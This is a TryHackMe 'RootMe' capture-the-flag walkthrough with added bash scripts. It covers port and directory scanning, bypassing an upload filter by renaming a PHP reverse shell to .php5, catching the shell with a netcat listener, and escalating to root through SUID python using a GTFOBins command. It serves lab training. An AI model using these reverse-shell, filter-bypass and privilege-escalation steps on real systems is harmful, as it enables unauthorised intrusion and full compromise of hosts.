
RootMe CTF [Writeup] TryHackMe

 

Deploy The Machine

The RootMe room is on TryHackMe.
Start the machine and wait until the target IP is shown.


Reconnaissance

Run nmap against the target to find the open ports.

Two ports are open: 22 (ssh) and 80 (http).

The web server is Apache 2.4.29; the Wappalyzer browser extension reports this.

SSH is running on port 22.
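The nmap step above done as a script, as an added example that is not part of the original writeup: it parses nmap's grepable (-oG) output into the open-port count and the service versions, so the first room question and the Apache version come out as data instead of being read off a screenshot. The scan that produces such a file would be `nmap -sV -oG rootme.gnmap 10.10.51.16` (target IP as used in this writeup). The gnmap file written inside the script is a constructed sample, not output captured from the box; only the Apache version is filled in, because that is the only version recorded here.

```shell
#!/usr/bin/env bash
# Added example, not part of the original writeup: parse nmap's grepable
# output so the recon step yields the open-port count and service versions
# as data. The scan that produces such a file is
#   nmap -sV -oG rootme.gnmap 10.10.51.16
# (target IP as used in the writeup). The file written below is a constructed
# sample in gnmap format, not output captured from the box; only the Apache
# version is filled in because that is the only version the writeup records.
set -u

# One "port/proto service [version]" line per open port in a .gnmap file.
# gnmap packs each port as "port/state/proto/owner/service/rpc/version/",
# with ports separated by ", ".
open_ports() {
  awk '
    match($0, /Ports: /) {
      p = substr($0, RSTART + RLENGTH)
      sub(/Ignored State:.*$/, "", p)   # drop the trailing field nmap appends
      sub(/[[:space:]]+$/, "", p)
      n = split(p, ports, ", ")
      for (j = 1; j <= n; j++) {
        split(ports[j], f, "/")
        if (f[2] == "open")
          printf "%s/%s %s%s\n", f[1], f[3], f[5], (f[7] == "" ? "" : " " f[7])
      }
    }' "$1"
}

# Number of open ports (the room's first question).
count_open() { open_ports "$1" | wc -l | tr -d ' '; }

# Version string nmap reported for one port; empty if it found none.
service_version() {  # service_version <file.gnmap> <port>
  open_ports "$1" | awk -v port="$2" 'index($0, port "/") == 1 { sub(/^[^ ]+ [^ ]+ ?/, ""); print }'
}

# Constructed sample standing in for rootme.gnmap.
SAMPLE=$(mktemp)
printf 'Host: 10.10.51.16 ()\tStatus: Up\n' > "$SAMPLE"
printf 'Host: 10.10.51.16 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http//Apache httpd 2.4.29 ((Ubuntu))/\tIgnored State: closed (998)\n' >> "$SAMPLE"

echo "open ports: $(count_open "$SAMPLE")"
open_ports "$SAMPLE"
```

Pointing `open_ports` at the real rootme.gnmap gives the same two lines for this box; `service_version rootme.gnmap 80` is the Apache banner the room asks for.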


The Apache version also shows up in the nmap service scan (-sV).


To find hidden directories I run gobuster:

$ gobuster dir -u http://10.10.51.16/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

It turns up /panel/ (an upload form) and /uploads/ (where uploaded files end up). The answer for the hidden directory is /panel/.



/panel/ is a file-upload form, so anything we upload lands on the server. That is the way to a shell: the room itself mentions a reverse shell, so the plan is to find a reverse-shell payload, upload it, and have the target connect back to a listener on my machine.

Getting a shell

Upload a PHP reverse shell through the form and start a listener on the attacking machine.

I use pentestmonkey's php-reverse-shell: https://github.com/pentestmonkey/php-reverse-shell (set $ip and $port to the attacking machine before uploading).

Uploading the file as .php is rejected with an error: the form does not accept the .php extension.


Renaming the file from .php to .php5 gets it through; the check only looks for the .php extension.


Start a listener on the attacking machine, then open the uploaded file in the browser. The target connects back to the attacking machine.



Either request the file from the terminal or click it under /uploads/. Apache executes the PHP, and since we are listening on port 1234 on the attacking machine, we get the reverse shell.
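The upload steps above, as an added example that is not part of the original writeup and not pentestmonkey's code: a small script that sets $ip and $port in a copy of php-reverse-shell.php, models the form's extension check to show why the rename to .php5 passes, and prints the listener and trigger commands. The attacker address 10.8.0.2 is a placeholder for your VPN IP; the target 10.10.51.16 and port 1234 are the ones used in this writeup. The "payload" the script writes is a constructed stand-in that carries the same two "CHANGE THIS" lines as the real file. The allowlist function is the defensive counterpart added for contrast, not the target's code.

```shell
#!/usr/bin/env bash
# Added example, not from the writeup and not pentestmonkey's code: get the
# php-reverse-shell ready for this box and show why renaming it to .php5 gets
# past the upload check. Assumed values: attacker address 10.8.0.2 is a
# placeholder for your VPN IP; the target 10.10.51.16 and port 1234 are the
# writeup's. The "payload" written below is a constructed stand-in carrying
# the same two "CHANGE THIS" lines as the real file.
set -u

# Set $ip and $port in a copy of php-reverse-shell.php. Only those two
# assignment lines are rewritten; the rest of the file is copied through.
prepare_payload() {  # prepare_payload <src.php> <lhost> <lport> <out>
  sed -e "s/^[\$]ip = '[^']*';/\$ip = '$2';/" \
      -e "s/^[\$]port = [0-9]*;/\$port = $3;/" "$1" > "$4"
}

# Model of the form's check, as far as the observed behaviour tells us: the
# final extension is compared against a blacklist holding only "php".
blacklist_filter() {  # 0 = accepted, 1 = rejected
  case "${1##*.}" in php) return 1 ;; *) return 0 ;; esac
}

# First extension the blacklist lets through. .php5 is what the writeup used;
# .phtml and .phar are other names an Apache PHP handler commonly covers.
pick_extension() {
  local ext
  for ext in php php5 phtml phar; do
    if blacklist_filter "shell.$ext"; then printf '%s\n' "$ext"; return 0; fi
  done
  return 1
}

# For contrast, the fix: an allowlist of what the form is meant to receive
# rejects every PHP variant at once. Added here; not the target's code.
allowlist_filter() {  # 0 = accepted, 1 = rejected
  case "${1##*.}" in jpg|jpeg|png|gif) return 0 ;; *) return 1 ;; esac
}

# Constructed stand-in for the downloaded php-reverse-shell.php.
WORK=$(mktemp -d)
SRC="$WORK/php-reverse-shell.php"
printf '%s\n' '<?php' "\$ip = '127.0.0.1';  // CHANGE THIS" "\$port = 1234;       // CHANGE THIS" '?>' > "$SRC"

EXT=$(pick_extension)                       # php5
OUT="$WORK/shell.$EXT"
prepare_payload "$SRC" 10.8.0.2 1234 "$OUT"
echo "upload $OUT through /panel/, then:"
echo "  nc -lvnp 1234                                  # on the attacking machine"
echo "  curl -s http://10.10.51.16/uploads/shell.$EXT   # or click it under /uploads/"
```

The allowlist only helps if the upload directory also refuses to execute scripts; an extension check on its own is what let .php5 through here.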



Now search for user.txt; it holds the first flag. I found it in /var/www.

Privilege Escalation

Q. Search for files with SUID permission, which file is weird?

Ans: /usr/bin/python

Python is installed on the target owned by root with the SUID bit set, so it runs with root's effective uid and can be used to escalate.


We can use https://gtfobins.github.io as mentioned in the hint.

Searching GTFOBins for python, the SUID section lists the command we need; with the THM hint, this is what gets us root.


The first command there only creates a SUID copy of python for practice, so we skip it; on this box the bit is already set. The second command spawns a root shell.

Because the GTFOBins command refers to ./python, first change into /usr/bin and then run it.
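The privilege-escalation steps above as a script, added here and not part of the original writeup: enumerate SUID binaries, flag the ones missing from a stock baseline (which is how /usr/bin/python stands out as "weird"), and keep the GTFOBins command in a function that is not run here because it replaces the current process with a root shell. BASELINE is a hand-picked, partial list of binaries that are SUID on a default Ubuntu install; extend it for other distributions. SAMPLE_SUID is constructed to mirror what the box shows, not output captured from it.

```shell
#!/usr/bin/env bash
# Added example, not part of the original writeup: list SUID binaries and flag
# the ones missing from a stock baseline, which is how /usr/bin/python stands
# out, then the GTFOBins step that turns it into a root shell. BASELINE is a
# hand-picked partial list of binaries that are SUID on a default Ubuntu
# install; extend it for other distributions. SAMPLE_SUID is constructed to
# mirror what the box shows, not output captured from it.
set -u

# The enumeration itself, one path per line.
find_suid() { find / -perm -4000 -type f 2>/dev/null; }

# SUID binaries expected on an Ubuntu 18.04-class system (partial).
BASELINE='
/bin/fusermount
/bin/mount
/bin/ping
/bin/su
/bin/umount
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/traceroute6.iputils
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
'

# Read paths on stdin, print the ones not in BASELINE. -x forces whole-line
# matches so /usr/bin/pass is not hidden by /usr/bin/passwd.
unusual_suid() {
  while IFS= read -r path; do
    [ -n "$path" ] || continue
    printf '%s\n' "$BASELINE" | grep -Fxq -- "$path" || printf '%s\n' "$path"
  done
}

# GTFOBins, python, SUID. Its first command (sudo install -m =xs $(which python) .)
# only creates a SUID copy for practice; here the bit is already set, so only
# the second is needed. -p puts sh in privileged mode so it keeps the
# effective uid instead of dropping back to the caller's.
root_shell_via_suid_python() {  # not executed here: it replaces this process with a root sh
  cd /usr/bin && ./python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
}

# Constructed stand-in for the output of find_suid on the target.
SAMPLE_SUID='
/bin/mount
/bin/ping
/bin/su
/bin/umount
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/python
/usr/bin/sudo
/usr/lib/openssh/ssh-keysign
'
echo "unusual SUID binaries:"
printf '%s\n' "$SAMPLE_SUID" | unusual_suid      # on the box: find_suid | unusual_suid
```

On the target the pipeline is `find_suid | unusual_suid`; anything it prints deserves a look on GTFOBins, and for /usr/bin/python the answer is the `root_shell_via_suid_python` command, which is the second GTFOBins command run from /usr/bin.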


Now we have root. Time to find the root flag.

It is in root's home directory, /root.


That's everything. Terminate the target machine.

Happy Hackers !!



